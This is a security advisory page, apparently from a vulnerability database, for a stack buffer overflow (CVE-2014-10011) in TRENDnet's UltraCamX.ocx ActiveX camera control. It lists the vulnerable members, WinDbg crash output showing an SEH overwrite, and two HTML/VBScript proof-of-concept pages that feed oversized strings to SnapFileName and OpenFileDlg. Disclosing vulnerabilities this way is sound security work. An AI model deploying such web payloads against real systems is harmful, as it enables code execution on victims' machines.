Lucene search

Gjoko KrsticZSL-2014-5211

HistoryNov 25, 2014 - 12:00 a.m.

TRENDnet SecurView Wireless Network Camera TV-IP422WN (UltraCamX.ocx) Stack BoF

2014-11-2500:00:00

Gjoko Krstic

zeroscience.mk

7.9 High

AI Score

Confidence

High

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.407 Medium

EPSS

Percentile

97.2%

JSON

Title: TRENDnet SecurView Wireless Network Camera TV-IP422WN (UltraCamX.ocx) Stack BoF
Advisory ID: ZSL-2014-5211
Type: Local/Remote
Impact: System Access
Risk: (4/5)
Release Date: 25.11.2014

Summary

SecurView Wireless N Day/Night Pan/Tilt Internet Camera, a powerful dual-codec wireless network camera with the 2-way audio function that provides the high-quality image and on-the-spot audio via the Internet connection.

Description

The UltraCam ActiveX Control ‘UltraCamX.ocx’ suffers from a stack buffer overflow vulnerability when parsing large amount of bytes to several functions in UltraCamLib, resulting in memory corruption overwriting severeal registers including the SEH. An attacker can gain access to the system of the affected node and execute arbitrary code.

--------------------------------------------------------------------------------

0:000> r eax=41414141 ebx=100ceff4 ecx=0042df38 edx=00487900 esi=00487a1c edi=0042e9fc eip=100203fb esp=0042d720 ebp=0042e9a8 iopl=0 nv up ei pl nz ac po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210212 UltraCamX!DllUnregisterServer+0xeb2b: 100203fb 8b48e0 mov ecx,dword ptr [eax-20h] ds:002b:41414121=???????? 0:000> !exchain 0042eda8: 41414141 Invalid exception stack at 41414141
--------------------------------------------------------------------------------

Vendor

TRENDnet - <http://www.trendnet.com>

Affected Version

TV-IP422WN/TV-IP422W

Tested On

Microsoft Windows 7 Professional SP1 (EN)

Vendor Status

N/A

PoC

trendnet_bof.txt

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <http://www.exploit-db.com/exploits/35363/>
[2] <http://packetstormsecurity.com/files/129262>
[3] <http://cxsecurity.com/issue/WLB-2014110169>
[4] <http://osvdb.org/show/osvdb/115037>
[5] <http://www.securityfocus.com/bid/71292>
[6] <http://www.vfocus.net/art/20141126/11848.html>
[7] <http://www.scip.ch/en/?vuldb.68288>
[8] <http://xforce.iss.net/xforce/xfdb/98948>
[9] <http://secunia.com/advisories/60244/>
[10] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-10011>
[11] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-10011>

Changelog

[25.11.2014] - Initial release
[26.11.2014] - Added reference [3], [4] and [5]
[27.11.2014] - Added reference [6]
[02.12.2014] - Added reference [7] and [8]
[21.12.2014] - Added reference [9]
[17.01.2015] - Added reference [10] and [11]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: [email protected]

<html><body><p>TRENDnet SecurView Wireless Network Camera TV-IP422WN (UltraCamX.ocx) Stack BoF


Vendor: TRENDnet
Product web page: http://www.trendnet.com
Affected version: TV-IP422WN/TV-IP422W

Summary: SecurView Wireless N Day/Night Pan/Tilt Internet Camera, a powerful
dual-codec wireless network camera with the 2-way audio function that provides
the high-quality image and on-the-spot audio via the Internet connection.

Desc: The UltraCam ActiveX Control 'UltraCamX.ocx' suffers from a stack buffer
overflow vulnerability when parsing large amount of bytes to several functions
in UltraCamLib, resulting in memory corruption overwriting severeal registers
including the SEH. An attacker can gain access to the system of the affected
node and execute arbitrary code.

-----------------------------------------------------------------------------

0:000&gt; r
eax=41414141 ebx=100ceff4 ecx=0042df38 edx=00487900 esi=00487a1c edi=0042e9fc
eip=100203fb esp=0042d720 ebp=0042e9a8 iopl=0         nv up ei pl nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210212
UltraCamX!DllUnregisterServer+0xeb2b:
100203fb 8b48e0          mov     ecx,dword ptr [eax-20h] ds:002b:41414121=????????
0:000&gt; !exchain
0042eda8: 41414141
Invalid exception stack at 41414141

-----------------------------------------------------------------------------


Tested on: Microsoft Windows 7 Professional SP1 (EN)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2014-5211
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5211.php


16.11.2014

---


Properties:
-----------

FileDescription		UltraCam ActiveX Control
FileVersion		1, 1, 52, 16
InternalName		UltraCamX
OriginalFileName	UltraCamX.ocx
ProductName		UltraCam device ActiveX Control
ProductVersion		1, 1, 52, 16


List of members:
----------------

Interface IUltraCamX : IDispatch
Default Interface: True
Members : 62
	RemoteHost
	RemotePort
	AccountCode
	GetConfigValue
	SetConfigValue
	SetCGIAPNAME
	Password
	UserName
	fChgImageSize
	ImgWidth
	ImgHeight
	SnapFileName
	AVIRecStart
	SetImgScale
	OpenFolder
	OpenFileDlg
	TriggerStatus
	AVIRecStatus
	Event_Frame
	PlayVideo
	SetAutoScale
	Event_Signal
	WavPlay
	CGI_ParamGet
	CGI_ParamSet
	MulticastEnable
	MulticastStatus
	SetPTUserAllow


Vulnerable members of the class:
--------------------------------

CGI_ParamSet
OpenFileDlg
SnapFileName
Password
SetCGIAPNAME
AccountCode
RemoteHost


PoC(s):
-------


<object classid="clsid:E1B26101-23FB-4855-9171-F79F29CC7728" id="target"></object>
<script language="vbscript">
targetFile = "C:\Windows\Downloaded Program Files\UltraCamX.ocx"
prototype  = "Property Let SnapFileName As String"
memberName = "SnapFileName"
progid     = "UltraCamLib.UltraCamX"
argCount   = 1

thricer=String(8212, "A")

target.SnapFileName = thricer

</script>


--

eax=41414141 ebx=00809590 ecx=41414141 edx=031e520f esi=0080c4d4 edi=00000009
eip=1002228c esp=003befb4 ebp=003befbc iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210206
UltraCamX!DllUnregisterServer+0x109bc:
1002228c 0fb64861        movzx   ecx,byte ptr [eax+61h]     ds:002b:414141a2=??

--



<object classid="clsid:E1B26101-23FB-4855-9171-F79F29CC7728" id="target"></object>
<script language="vbscript">
targetFile = "C:\Windows\Downloaded Program Files\UltraCamX.ocx"
prototype  = "Function OpenFileDlg ( ByVal sFilter As String ) As String"
memberName = "OpenFileDlg"
progid     = "UltraCamLib.UltraCamX"
argCount   = 1

thricer=String(2068, "A")

target.OpenFileDlg thricer

</script>


--

0:000&gt; r
eax=41414141 ebx=100ceff4 ecx=0042df38 edx=00487900 esi=00487a1c edi=0042e9fc
eip=100203fb esp=0042d720 ebp=0042e9a8 iopl=0         nv up ei pl nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210212
UltraCamX!DllUnregisterServer+0xeb2b:
100203fb 8b48e0          mov     ecx,dword ptr [eax-20h] ds:002b:41414121=????????
0:000&gt; !exchain
0042eda8: 41414141
Invalid exception stack at 41414141

--
</p></body></html>

7.9 High

AI Score

Confidence

High

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.407 Medium

EPSS

Percentile

97.2%

JSON

Related for ZSL-2014-5211